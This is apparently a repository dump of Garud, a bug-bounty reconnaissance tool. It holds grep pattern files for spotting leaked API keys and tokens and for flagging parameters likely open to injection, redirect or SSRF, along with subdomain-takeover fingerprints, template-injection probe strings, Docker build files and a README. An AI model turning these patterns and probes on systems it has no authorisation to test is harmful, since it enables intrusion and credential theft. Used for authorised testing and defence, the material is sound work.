| { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "django", 5 | "laravel", 6 | "symfony", 7 | "graphite", 8 | "grafana", 9 | "X-Drupal-Cache", 10 | "struts", 11 | "code ?igniter", 12 | "cake ?php", 13 | "grails", 14 | "elastic ?search", 15 | "kibana", 16 | "log ?stash", 17 | "tomcat", 18 | "jenkins", 19 | "hudson", 20 | "com.atlassian.jira", 21 | "Apache Subversion", 22 | "Chef Server", 23 | "RabbitMQ Management", 24 | "Mongo", 25 | 
"Travis CI - Enterprise", 26 | "BMC Remedy", 27 | "artifactory" 28 | ] 29 | } 30 | -------------------------------------------------------------------------------- /.github/payloads/patterns/github_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "github.*['|\"][0-9a-zA-Z]{35,40}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/go-functions.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": "func [a-z0-9_]+\\(" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/google-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "AIza[0-9A-Za-z\\-\\_]{35}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-service-account_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "\"type\": \"service_account\"" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "ya29\\.[0-9A-Za-z\\-\\_]+" 4 | } -------------------------------------------------------------------------------- 
/.github/payloads/patterns/heroku-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "heroku.*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/http-auth.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hiaoE", 3 | "pattern": "[a-z0-9_/\\.:-]+@[a-z0-9-]+\\.[a-z0-9.-]+" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/idor.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "id=", 6 | "user=", 7 | "account=", 8 | "number=", 9 | "order=", 10 | "no=", 11 | "doc=", 12 | "key=", 13 | "email=", 14 | "group=", 15 | "profile=", 16 | "edit=", 17 | "report=" 18 | 19 | ] 20 | } 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /.github/payloads/patterns/img-traversal.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "=.*.jpg", 6 | "=.*.jpeg", 7 | "=.*.gif", 8 | "=.*.png" 9 | ] 10 | } 11 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingEXT.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "\\.action", 6 | "\\.adr", 7 | "\\.ascx", 8 | "\\.asmx", 9 | "\\.axd", 10 | "\\.backup", 11 | "\\.bak", 12 | "\\.bkf", 13 | "\\.bkp", 14 | "\\.bok", 15 | "\\.achee", 16 | "\\.cfg", 17 | "\\.cfm", 18 | "\\.cgi", 19 | "\\.cnf", 20 | "\\.conf", 21 | "\\.config", 22 | "\\.crt", 23 | "\\.csr", 24 | "\\.csv", 25 | "\\.dat", 26 | "\\.doc", 27 | "\\.docx", 28 | 
"\\.eml", 29 | "\\.env", 30 | "\\.exe", 31 | "\\.gz", 32 | "\\.ica", 33 | "\\.inf", 34 | "\\.ini", 35 | "\\.java", 36 | "\\.json", 37 | "\\.key", 38 | "\\.log", 39 | "\\.lst", 40 | "\\.mai", 41 | "\\.mbox", 42 | "\\.mbx", 43 | "\\.md", 44 | "\\.mdb", 45 | "\\.nsf", 46 | "\\.old", 47 | "\\.ora", 48 | "\\.pac", 49 | "\\.passwd", 50 | "\\.pcf", 51 | "\\.pdf", 52 | "\\.pem", 53 | "\\.pgp", 54 | "\\.pl", 55 | " plist", 56 | "\\.pwd", 57 | "\\.rdp", 58 | "\\.reg", 59 | "\\.rtf", 60 | "\\.skr", 61 | "\\.sql", 62 | "\\.swf", 63 | "\\.tpl", 64 | "\\.txt", 65 | "\\.url", 66 | "\\.wml", 67 | "\\.xls", 68 | "\\.xlsx", 69 | "\\.xml", 70 | "\\.xsd", 71 | "\\.yml" 72 | ] 73 | } 74 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingparams.json: -------------------------------------------------------------------------------- 1 | 2 | { 3 | "flags": "-iE", 4 | "patterns": [ 5 | 6 | "template=", 7 | "preview=", 8 | "id=", 9 | "view=", 10 | "activity=", 11 | "name=", 12 | "content=", 13 | "redirect=", 14 | "(&|[?])access(&|=)", 15 | "(&|[?])admin(&|=)", 16 | "(&|[?])dbg(&|=)", 17 | "(&|[?])debug(&|=)", 18 | "(&|[?])edit(&|=)", 19 | "(&|[?])grant(&|=)", 20 | "(&|[?])test(&|=)", 21 | "(&|[?])alter(&|=)", 22 | "(&|[?])clone(&|=)", 23 | "(&|[?])create(&|=)", 24 | "(&|[?])delete(&|=)", 25 | "(&|[?])disable(&|=)", 26 | "(&|[?])enable(&|=)", 27 | "(&|[?])exec(&|=)", 28 | "(&|[?])execute(&|=)", 29 | "(&|[?])load(&|=)", 30 | "(&|[?])make(&|=)", 31 | "(&|[?])modify(&|=)", 32 | "(&|[?])rename(&|=)", 33 | "(&|[?])reset(&|=)", 34 | "(&|[?])shell(&|=)", 35 | "(&|[?])toggle(&|=)", 36 | "(&|[?])adm(&|=)", 37 | "(&|[?])root(&|=)", 38 | "(&|[?])cfg(&|=)", 39 | "(&|[?])dest(&|=)", 40 | "(&|[?])redirect(&|=)", 41 | "(&|[?])uri(&|=)", 42 | "(&|[?])path(&|=)", 43 | "(&|[?])continue(&|=)", 44 | "(&|[?])url(&|=)", 45 | "(&|[?])window(&|=)", 46 | "(&|[?])next(&|=)", 47 | "(&|[?])data(&|=)", 48 | "(&|[?])reference(&|=)", 49 | 
"(&|[?])site(&|=)", 50 | "(&|[?])html(&|=)", 51 | "(&|[?])val(&|=)", 52 | "(&|[?])validate(&|=)", 53 | "(&|[?])domain(&|=)", 54 | "(&|[?])callback(&|=)", 55 | "(&|[?])return(&|=)", 56 | "(&|[?])feed(&|=)", 57 | "(&|[?])host(&|=)", 58 | "(&|[?])port(&|=)", 59 | "(&|[?])to(&|=)", 60 | "(&|[?])out(&|=)", 61 | "(&|[?])view(&|=)", 62 | "(&|[?])dir(&|=)", 63 | "(&|[?])show(&|=)", 64 | "(&|[?])navigation(&|=)", 65 | "(&|[?])open(&|=)", 66 | "(&|[?])file(&|=)", 67 | "(&|[?])document(&|=)", 68 | "(&|[?])folder(&|=)", 69 | "(&|[?])pg(&|=)", 70 | "(&|[?])php_path(&|=)", 71 | "(&|[?])style(&|=)", 72 | "(&|[?])doc(&|=)", 73 | "(&|[?])img(&|=)", 74 | "(&|[?])filename(&|=)", 75 | "id=", 76 | "select=", 77 | "report=", 78 | "role=", 79 | "update=", 80 | "query=", 81 | "user=", 82 | "name=", 83 | "sort=", 84 | "where=", 85 | "search=", 86 | "params=", 87 | "process=", 88 | "row=", 89 | "view=", 90 | "table=", 91 | "from=", 92 | "sel=", 93 | "results=", 94 | "sleep=", 95 | "fetch=", 96 | "order=", 97 | "keyword=", 98 | "column=", 99 | "field=", 100 | "delete=", 101 | "string=", 102 | "number=", 103 | "filter=", 104 | "(&|[?])callback=", 105 | "(&|[?])cgi-bin/redirect.cgi", 106 | "(&|[?])checkout=", 107 | "(&|[?])checkout_url=", 108 | "(&|[?])continue=", 109 | "(&|[?])data=", 110 | "(&|[?])dest=", 111 | "(&|[?])destination=", 112 | "(&|[?])dir=", 113 | "(&|[?])domain=", 114 | "(&|[?])feed=", 115 | "(&|[?])file=", 116 | "(&|[?])file_name=", 117 | "(&|[?])file_url=", 118 | "(&|[?])folder=", 119 | "(&|[?])folder_url=", 120 | "(&|[?])forward=", 121 | "(&|[?])from_url=", 122 | "(&|[?])go=", 123 | "(&|[?])goto=", 124 | "(&|[?])host=", 125 | "(&|[?])html=", 126 | "(&|[?])image_url=", 127 | "(&|[?])img_url=", 128 | "(&|[?])load_file=", 129 | "(&|[?])load_url=", 130 | "(&|[?])login_url=", 131 | "(&|[?])logout=", 132 | "(&|[?])navigation=", 133 | "(&|[?])next=", 134 | "(&|[?])next_page=", 135 | "(&|[?])Open=", 136 | "(&|[?])out=", 137 | "(&|[?])page_url=", 138 | "(&|[?])path=", 139 | 
"(&|[?])port=", 140 | "(&|[?])redir=", 141 | "(&|[?])redirect=", 142 | "(&|[?])redirect_to=", 143 | "(&|[?])redirect_uri=", 144 | "(&|[?])redirect_url=", 145 | "(&|[?])reference=", 146 | "(&|[?])return=", 147 | "(&|[?])return_path=", 148 | "(&|[?])return_to=", 149 | "(&|[?])returnTo=", 150 | "(&|[?])return_url=", 151 | "(&|[?])rt=", 152 | "(&|[?])rurl=", 153 | "(&|[?])show=", 154 | "(&|[?])site=", 155 | "(&|[?])target=", 156 | "(&|[?])to=", 157 | "(&|[?])uri=", 158 | "(&|[?])url=", 159 | "(&|[?])val=", 160 | "(&|[?])validate=", 161 | "(&|[?])view=", 162 | "(&|[?])window=", 163 | "daemon=", 164 | "upload=", 165 | "dir=", 166 | "execute=", 167 | "download=", 168 | "log=", 169 | "ip=", 170 | "cli=", 171 | "cmd=", 172 | "file=", 173 | "document=", 174 | "folder=", 175 | "root=", 176 | "path=", 177 | "pg=", 178 | "style=", 179 | "pdf=", 180 | "template=", 181 | "php_path=", 182 | "doc=", 183 | "page=", 184 | "name=", 185 | "id=", 186 | "user=", 187 | "account=", 188 | "number=", 189 | "order=", 190 | "no=", 191 | "doc=", 192 | "key=", 193 | "email=", 194 | "group=", 195 | "profile=", 196 | "edit=", 197 | "report=", 198 | "access=", 199 | "admin=", 200 | "dbg=", 201 | "debug=", 202 | "edit=", 203 | "grant=", 204 | "test=", 205 | "alter=", 206 | "clone=", 207 | "create=", 208 | "delete=", 209 | "disable=", 210 | "enable=", 211 | "exec=", 212 | "execute=", 213 | "load=", 214 | "make=", 215 | "modify=", 216 | "rename=", 217 | "reset=", 218 | "shell=", 219 | "toggle=", 220 | "adm=", 221 | "root=", 222 | "cfg=", 223 | "config=" 224 | ] 225 | } 226 | 227 | 228 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingsubs.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "admin", 5 | "jenkins", 6 | "test", 7 | "proxy", 8 | "stage", 9 | "test", 10 | "dev", 11 | "devops", 12 | "staff", 13 | "db", 14 | "qa", 15 | "internal" 16 | ] 17 
| } 18 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ip.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnoE", 3 | "pattern": "(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/json-sec.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-harioE", 3 | "pattern": "(\\\\?\"|"|%22)[a-z0-9_-]*(api[_-]?key|S3|aws_|secret|passw|auth)[a-z0-9_-]*(\\\\?\"|"|%22): ?(\\\\?\"|"|%22)[^\"&]+(\\\\?\"|"|%22)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/jsvar.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanroE", 3 | "pattern": "var [a-z0-9_]+\\=." 
4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/jwt.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(jwt|jks|jwk|jku)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/lfi.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "file=", 6 | "document=", 7 | "folder=", 8 | "root=", 9 | "path=", 10 | "pg=", 11 | "style=", 12 | "pdf=", 13 | "template=", 14 | "php_path=", 15 | "doc=", 16 | "page=", 17 | "name=", 18 | "cat=", 19 | "dir=", 20 | "action=", 21 | "board=", 22 | "date=", 23 | "detail=", 24 | "download=", 25 | "prefix=", 26 | "include=", 27 | "inc=", 28 | "locate=", 29 | "show=", 30 | "site=", 31 | "type=", 32 | "view=", 33 | "content=", 34 | "layout=", 35 | "mod=", 36 | "conf=", 37 | "url=" 38 | 39 | 40 | ] 41 | } 42 | -------------------------------------------------------------------------------- /.github/payloads/patterns/mailchimp-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "[0-9a-f]{32}-us[0-9]{1,2}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/mailgun-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "key-[0-9a-zA-Z]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/meg-headers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hoiE", 3 | "pattern": "^\u003c [a-z0-9_\\-]+: .*" 4 | } 5 | -------------------------------------------------------------------------------- 
/.github/payloads/patterns/parsers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(parse|open|request|validate|verify)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/paypal-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/php-curl.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "pattern": "CURLOPT_(HTTPHEADER|HEADER|COOKIE|RANGE|REFERER|USERAGENT|PROXYHEADER)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-errors.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "php warning", 5 | "php error", 6 | "fatal error", 7 | "uncaught exception", 8 | "include_path", 9 | "undefined index", 10 | "undefined variable", 11 | "\\?php", 12 | "<\\?[^x]", 13 | "stack trace\\:", 14 | "expects parameter [0-9]*", 15 | "Debug Trace" 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-serialized.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "patterns": [ 4 | "a:[0-9]+:{", 5 | "O:[0-9]+:\"", 6 | "s:[0-9]+:\"" 7 | ] 8 | } 9 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-sinks.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": 
"[^a-z0-9_](system|exec|popen|pcntl_exec|eval|create_function|unserialize|file_exists|md5_file|filemtime|filesize|assert) ?\\(" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-sources.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "patterns": [ 4 | "\\$_(POST|GET|COOKIE|REQUEST|SERVER|FILES)", 5 | "php://(input|stdin)" 6 | ] 7 | } 8 | -------------------------------------------------------------------------------- /.github/payloads/patterns/picatic-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "sk_live_[0-9a-z]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/rce.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "daemon=", 6 | "upload=", 7 | "dir=", 8 | "download=", 9 | "log=", 10 | "ip=", 11 | "cli=", 12 | "cmd=", 13 | "exec=", 14 | "command=", 15 | "execute=", 16 | "ping=", 17 | "query=", 18 | "jump=", 19 | "code=", 20 | "reg=", 21 | "do=", 22 | "func=", 23 | "arg=", 24 | "option=", 25 | "load=", 26 | "process=", 27 | "step=", 28 | "read=", 29 | "function", 30 | "req=", 31 | "feature=", 32 | "exe=", 33 | "module=", 34 | "payload=", 35 | "run=", 36 | "print=" 37 | ] 38 | } 39 | -------------------------------------------------------------------------------- /.github/payloads/patterns/redirect.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "Lmage_url=", 5 | "Open=", 6 | "callback=", 7 | "cgi-bin/redirect.cgi", 8 | "cgi-bin/redirect.cgi?", 9 | "checkout=", 10 | "checkout_url=", 11 | "continue=", 12 | "data=", 13 | "dest=", 14 | "destination=", 15 | "dir=", 16 | "domain=", 17 | "feed=", 
18 | "file=", 19 | "file_name=", 20 | "file_url=", 21 | "folder=", 22 | "folder_url=", 23 | "forward=", 24 | "from_url=", 25 | "go=", 26 | "goto=", 27 | "host=", 28 | "html=", 29 | "image_url=", 30 | "img_url=", 31 | "load_file=", 32 | "load_url=", 33 | "login?to=", 34 | "login_url=", 35 | "logout=", 36 | "navigation=", 37 | "next=", 38 | "next_page=", 39 | "out=", 40 | "page=", 41 | "page_url=", 42 | "path=", 43 | "port=", 44 | "redir=", 45 | "redirect=", 46 | "redirect_to=", 47 | "redirect_uri=", 48 | "redirect_url=", 49 | "reference=", 50 | "return=", 51 | "returnTo=", 52 | "return_path=", 53 | "return_to=", 54 | "return_url=", 55 | "rt=", 56 | "rurl=", 57 | "show=", 58 | "site=", 59 | "target=", 60 | "to=", 61 | "uri=", 62 | "url=", 63 | "val=", 64 | "validate=", 65 | "view=", 66 | "window=" 67 | ] 68 | } 69 | -------------------------------------------------------------------------------- /.github/payloads/patterns/s3-buckets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hiaoE", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.s3\\.amazonaws\\.com", 5 | "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com", 6 | "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)", 7 | "//s3\\.amazonaws\\.com/[a-z0-9._-]+", 8 | "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" 9 | ] 10 | } 11 | -------------------------------------------------------------------------------- /.github/payloads/patterns/sec.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HaniE", 3 | "pattern": "(aws_access|aws_secret|api[_-]?key|ListBucketResult|S3_ACCESS_KEY|Authorization:|RSA PRIVATE|Index of|aws_|secret|ssh-rsa AA)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": 
"(password|private|token|secret|key|authorization|bearer)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/serial.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(pickle|yaml|serialize|marshal|objectinput)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/servers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hri", 3 | "pattern": "server: " 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/slack-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/slack-webhook_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/sqli.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "=", 5 | "id=", 6 | "select=", 7 | "report=", 8 | "role=", 9 | "update=", 10 | "query=", 11 | "user=", 12 | "name=", 13 | "sort=", 14 | "where=", 15 | "search=", 16 | "params=", 17 | "process=", 18 | "row=", 19 | "view=", 20 | "table=", 21 | "from=", 22 | "sel=", 23 | "results=", 24 | "sleep=", 25 | "fetch=", 26 | "order=", 27 | "keyword=", 28 | "column=", 29 | "field=", 30 | "delete=", 31 | "string=", 32 | "number=", 33 | 
"filter=" 34 | ] 35 | } 36 | -------------------------------------------------------------------------------- /.github/payloads/patterns/square-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "sq0atp-[0-9A-Za-z\\-\\_]{22}", 5 | "rsq0csp-[0-9A-Za-z\\-\\_]{43}" 6 | ] 7 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/ssrf.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "access=", 6 | "admin=", 7 | "dbg=", 8 | "debug=", 9 | "edit=", 10 | "grant=", 11 | "test=", 12 | "alter=", 13 | "clone=", 14 | "create=", 15 | "delete=", 16 | "disable=", 17 | "enable=", 18 | "exec=", 19 | "execute=", 20 | "load=", 21 | "make=", 22 | "modify=", 23 | "rename=", 24 | "reset=", 25 | "shell=", 26 | "toggle=", 27 | "adm=", 28 | "root=", 29 | "cfg=", 30 | "dest=", 31 | "redirect=", 32 | "uri=", 33 | "path=", 34 | "continue=", 35 | "url=", 36 | "window=", 37 | "next=", 38 | "data=", 39 | "reference=", 40 | "site=", 41 | "html=", 42 | "val=", 43 | "validate=", 44 | "domain=", 45 | "callback=", 46 | "return=", 47 | "page=", 48 | "feed=", 49 | "host=", 50 | "port=", 51 | "to=", 52 | "out=", 53 | "view=", 54 | "dir=", 55 | "show=", 56 | "navigation=", 57 | "open=", 58 | "file=", 59 | "document=", 60 | "folder=", 61 | "pg=", 62 | "php_path=", 63 | "style=", 64 | "doc=", 65 | "img=", 66 | "filename=" 67 | 68 | ] 69 | } 70 | 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ssti.json: -------------------------------------------------------------------------------- 1 | 2 | { 3 | "flags": "-iE", 4 | "patterns": [ 5 | 6 | "template=", 7 | "preview=", 8 | "id=", 9 | "view=", 10 | "activity=", 11 | "name=", 12 | "content=", 13 | "redirect=" 14 | ] 15 | } 16 | 
-------------------------------------------------------------------------------- /.github/payloads/patterns/strings.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hoiaE", 3 | "patterns": [ 4 | "\"[^\"]+\"", 5 | "'[^']+'" 6 | ] 7 | } 8 | -------------------------------------------------------------------------------- /.github/payloads/patterns/stripe-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "sk_live_[0-9a-zA-Z]{24}", 5 | "rk_live_[0-9a-zA-Z]{24}" 6 | ] 7 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/swearwords.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(fuck|shit|stupid|dumb)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/takeovers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "There is no app configured at that hostname", 5 | "NoSuchBucket", 6 | "No Such Account", 7 | "You're Almost There", 8 | "a GitHub Pages site here", 9 | "There's nothing here", 10 | "project not found", 11 | "Your CNAME settings", 12 | "InvalidBucketName", 13 | "PermanentRedirect", 14 | "The specified bucket does not exist", 15 | "Repository not found", 16 | "Sorry, We Couldn't Find That Page", 17 | "The feed has not been found.", 18 | "The thing you were looking for is no longer here, or never was", 19 | "Please renew your subscription", 20 | "There isn't a Github Pages site here.", 21 | "We could not find what you're looking for.", 22 | "No settings were found for this company:", 23 | "No such app", 24 | "is not a registered InCloud YouTrack", 25 | "Unrecognized domain", 26 | "project not found", 27 | "This 
UserVoice subdomain is currently available!", 28 | "Do you want to register", 29 | "Help Center Closed" 30 | ] 31 | } 32 | 33 | -------------------------------------------------------------------------------- /.github/payloads/patterns/twilio-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "SK[0-9a-fA-F]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/twitter-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "twitter.*['|\"][0-9a-zA-Z]{35,44}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/twitter-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "twitter.*[1-9][0-9]+-[0-9a-zA-Z]{40}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/upload-fields.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": "\u003cinput[^\u003e]+type=[\"']?file[\"']?" 
4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/urls.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-oiahE", 3 | "pattern": "https?://[^\"\\'> ]+" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/xml.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(xml|xerces|sax|etree|xpath|documentbuilder)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/xss.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "=", 5 | "q=", 6 | "s=", 7 | "search=", 8 | "lang=", 9 | "keyword=", 10 | "query=", 11 | "page=", 12 | "keywords=", 13 | "year=", 14 | "view=", 15 | "email=", 16 | "type=", 17 | "name=", 18 | "p=", 19 | "callback=", 20 | "jsonp=", 21 | "api_key=", 22 | "api=", 23 | "password=", 24 | "email=", 25 | "emailto=", 26 | "token=", 27 | "username=", 28 | "csrf_token=", 29 | "unsubscribe_token=", 30 | "id=", 31 | "item=", 32 | "page_id=", 33 | "month=", 34 | "immagine=", 35 | "list_type=", 36 | "url=", 37 | "terms=", 38 | "categoryid=", 39 | "key=", 40 | "l=", 41 | "begindate=", 42 | "enddate=" 43 | 44 | ] 45 | } 46 | -------------------------------------------------------------------------------- /.github/payloads/ssti.txt: -------------------------------------------------------------------------------- 1 | check-ssti{{7*7}}[[1*1]] 2 | check-ssti{{7*7}} 3 | check-ssti{{7*'7'}} 4 | check-ssti<%= 7 * 7 %> 5 | check-ssti${7*7} 6 | check-ssti${{7*7}} 7 | check-ssti@(7*7) 8 | check-ssti#{7*7} 9 | check-ssti#{ 7 * 7 } 10 | -------------------------------------------------------------------------------- /.github/workflows/push-to-docker.yml: 
-------------------------------------------------------------------------------- 1 | name: CI to Docker Hub 2 | 3 | on: 4 | push: 5 | branches: 6 | - 'master' 7 | tags: 8 | - 'v*' 9 | 10 | jobs: 11 | push_to_registry: 12 | name: Push Docker image to Docker Hub 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout the repo 16 | uses: actions/checkout@v2 17 | 18 | - name: Extract metadata (tags, labels) for Docker 19 | id: meta 20 | uses: docker/metadata-action@v3 21 | with: 22 | images: r0x4r/garud 23 | tags: | 24 | type=raw,value=latest 25 | type=semver,pattern={{version}} 26 | type=semver,pattern={{major}}.{{minor}} 27 | 28 | - name: Login to Docker Hub 29 | uses: docker/login-action@v1 30 | with: 31 | username: ${{ secrets.DOCKER_HUB_USERNAME }} 32 | password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} 33 | 34 | - name: Set up Docker Buildx 35 | id: buildx 36 | uses: docker/setup-buildx-action@v1 37 | 38 | - name: Build and push Docker image 39 | uses: docker/build-push-action@v2 40 | with: 41 | context: . 42 | push: true 43 | tags: ${{ steps.meta.outputs.tags }} 44 | labels: ${{ steps.meta.outputs.labels }} 45 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1.3-labs 2 | 3 | #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# 4 | 5 | FROM golang:1.16-alpine AS go-builder 6 | ENV GO111MODULE=on 7 | RUN < 2 |
3 | Garud 4 | 5 | 6 |

An automation tool that enumerates sub-domains, checks them for sub-domain takeover, and then filters out XSS, SSTI, SSRF and other injection-point parameters.

7 | 8 |

9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |

17 | 18 | --- 19 | 20 | I made this tool to automate my recon and save time. It was a headache to type each command by hand, wait for it to complete and then type the next one. So I collected some of the tools that are widely used in the bug bounty field. This script uses Assetfinder, subfinder, amass, httpx, sublister, gauplus and gf patterns, and then runs dirsearch, dalfox, nuclei and kxss to find some low-hanging fruit.
